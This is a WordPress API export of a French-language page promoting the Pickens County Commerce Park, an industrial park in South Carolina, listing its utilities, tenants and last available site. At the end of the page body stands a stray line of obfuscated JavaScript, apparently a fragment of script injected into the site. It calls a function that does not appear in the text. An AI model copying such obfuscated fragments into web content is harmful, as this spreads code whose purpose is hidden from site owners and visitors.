{"id":11625,"date":"2020-12-04T17:51:29","date_gmt":"2020-12-04T17:51:29","guid":{"rendered":"http:\/\/alliancepickens.com\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/"},"modified":"2020-12-04T17:53:16","modified_gmt":"2020-12-04T17:53:16","slug":"parc-commercial-du-comte-de-pickens","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/","title":{"rendered":"Parc commercial du comt\u00e9 de Pickens"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9813&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Le Pickens County Commerce Park est un parc industriel de classe A de 310 acres avec 6 000 pieds de fa\u00e7ade de choix sur la route 123 am\u00e9ricaine \u00e0 quatre voies. Le Pickens County Commerce Park dispose d\u2019une infrastructure compl\u00e8te de services publics qui comprend 2 fournisseurs d\u2019\u00e9lectricit\u00e9, un commutateur de fibre d\u00e9di\u00e9, une capacit\u00e9 d\u2019eaux us\u00e9es suffisantes, la capacit\u00e9 d\u2019eau et un r\u00e9servoir de stockage d\u2019eau de 1 million de gallons qui est d\u00e9di\u00e9 \u00e0 l\u2019utilisation par les installations de Commerce Park.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/P9cls2EmFko&#8221;][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;1\/2&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/r9VClCbSsmo&#8221;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_video link=&#8221;https:\/\/youtu.be\/wZQoJ4p6FMo&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;5565&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_column_text]<\/p>\n<h3><\/h3>\n<h3 style=\"text-align: center\">Les entreprises du parc commercial du comt\u00e9 de Pickens comprennent :<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Abbott<\/li>\n<li>era-contact Etats-Unis<\/li>\n<li>IPSUM Technologies<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>TECHNOLOGIES D\u2019automatisation JR<\/li>\n<li>KeyMark, Inc.<\/li>\n<li>Reliable Automatic Sprinkler Company<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Safeplast \u00c9tats-Unis<\/li>\n<li>Taylormade<\/li>\n<li>Outil et moule unis<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text]<\/p>\n<h3 style=\"text-align: center\"><\/h3>\n<h3 style=\"text-align: center\">Pickens County Commerce Park Caract\u00e9ristiques comprennent:<\/h3>\n<p>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Parc industriel de classe A<\/li>\n<li>Pactes de protection en place | <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants-1.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Lire la suite<\/a><\/li>\n<li>Deux sous-stations \u00e9lectriques et deux fournisseurs d\u2019\u00e9lectricit\u00e9<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Commutateur de fibre num\u00e9rique sur place<\/li>\n<li>Infrastructure robuste en place<\/li>\n<li>Plus de 1,1 million de pieds carr\u00e9s de construction de b\u00e2timents<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;]<div class=\"standard-arrow list-divider bullet-top\"><ul>\n<li>Environnement semblable \u00e0 celui du campus<\/li>\n<li>Entre Charlotte, NC et Atlanta, GA<\/li>\n<li>Un site restant<\/li>\n<\/ul>\n<\/div>[\/vc_column_inner][\/vc_row_inner][vc_column_text el_class=&#8221;fullbtn&#8221;]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/\">En savoir plus sur le Pickens County Commerce Park<\/a>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; el_id=&#8221;industrial_parks&#8221;][vc_column][vc_empty_space][vc_column_text]Si votre entreprise est int\u00e9ress\u00e9e \u00e0 en apprendre davantage sur le dernier site industriel disponible dans le parc commercial du comt\u00e9 de Pickens, veuillez <a href=\"http:\/\/alliancepickens.com\/fr\/qui-sommes-nous\/#contact\">communiquer avec <\/a>Alliance Pickens. <a href=\"http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/10\/PCCP-Protective-Covenenants.pdf\">Voir les clauses de protection pour le parc commercial du comt\u00e9 de Pickens<\/a>[\/vc_column_text][vc_empty_space][vc_single_image image=&#8221;10658&#8243; img_size=&#8221;full&#8221; onclick=&#8221;custom_link&#8221; link=&#8221;http:\/\/alliancepickens.com\/wp-content\/uploads\/2020\/11\/PCCP-1.pdf&#8221;][vc_empty_space][vc_column_text]<span style=\"font-weight: 400\">Le site A est le dernier site du parc commercial du comt\u00e9 de Pickens. Vingt (20) acres de table donnent sur les blue ridge mountains. Les images du drone affichent des rendus pour un (1) et deux (2) am\u00e9nagements de b\u00e2timents. Ces rendus suivent les  <\/span>normes \u00e9tablies dans les clauses de protection du parc commercial du comt\u00e9 de <span style=\"font-weight: 400\">Pickens. <\/span> <span style=\"font-weight: 400\">Commerce Park Protective Covenants.<\/span>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;10665&#8243; el_class=&#8221;parallaxbreak&#8221;][vc_column][vc_empty_space height=&#8221;450px&#8221;][\/vc_column][\/vc_row][vc_row el_class=&#8221;learnmoreabout&#8221;][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center\">En savoir plus sur les sites et les b\u00e2timents<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=&#8221;19&#8243;][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Pr\u00eat \u00e0 commencer?<\/h1>\n<h3>Nous sommes impatients de vous parler!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Contactez notre \u00e9quipe<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9813&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Le Pickens County Commerce Park est un parc industriel de classe A de 310 acres avec 6 000 pieds de fa\u00e7ade de choix sur la route 123 am\u00e9ricaine \u00e0 quatre voies. Le Pickens County Commerce Park dispose d\u2019une infrastructure compl\u00e8te de services publics qui comprend 2 fournisseurs d\u2019\u00e9lectricit\u00e9, un commutateur&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8689,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-11625","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Parc commercial du comt\u00e9 de Pickens - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Parc commercial du comt\u00e9 de Pickens - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9813&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Le Pickens County Commerce Park est un parc industriel de classe A de 310 acres avec 6 000 pieds de fa\u00e7ade de choix sur la route 123 am\u00e9ricaine \u00e0 quatre voies. Le Pickens County Commerce Park dispose d\u2019une infrastructure compl\u00e8te de services publics qui comprend 2 fournisseurs d\u2019\u00e9lectricit\u00e9, un commutateur&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T17:53:16+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/parc-commercial-du-comte-de-pickens\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/parc-commercial-du-comte-de-pickens\\\/\",\"name\":\"Parc commercial du comt\u00e9 de Pickens - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\"},\"datePublished\":\"2020-12-04T17:51:29+00:00\",\"dateModified\":\"2020-12-04T17:53:16+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/parc-commercial-du-comte-de-pickens\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/parc-commercial-du-comte-de-pickens\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/parc-commercial-du-comte-de-pickens\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sites et b\u00e2timents\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/sites-et-batiments\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Parc commercial du comt\u00e9 de Pickens\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Parc commercial du comt\u00e9 de Pickens - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/","og_locale":"fr_FR","og_type":"article","og_title":"Parc commercial du comt\u00e9 de Pickens - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_single_image image=&#8221;9813&#8243; img_size=&#8221;full&#8221; el_class=&#8221;pccp&#8221;][vc_column_text]Le Pickens County Commerce Park est un parc industriel de classe A de 310 acres avec 6 000 pieds de fa\u00e7ade de choix sur la route 123 am\u00e9ricaine \u00e0 quatre voies. Le Pickens County Commerce Park dispose d\u2019une infrastructure compl\u00e8te de services publics qui comprend 2 fournisseurs d\u2019\u00e9lectricit\u00e9, un commutateur&hellip;","og_url":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T17:53:16+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/","url":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/","name":"Parc commercial du comt\u00e9 de Pickens - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/fr\/#website"},"datePublished":"2020-12-04T17:51:29+00:00","dateModified":"2020-12-04T17:53:16+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/parc-commercial-du-comte-de-pickens\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Sites et b\u00e2timents","item":"https:\/\/alliancepickens.com\/fr\/sites-et-batiments\/"},{"@type":"ListItem","position":3,"name":"Parc commercial du comt\u00e9 de Pickens"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/fr\/#website","url":"https:\/\/alliancepickens.com\/fr\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/11625","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/comments?post=11625"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/11625\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/pages\/8689"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/fr\/wp-json\/wp\/v2\/media?parent=11625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}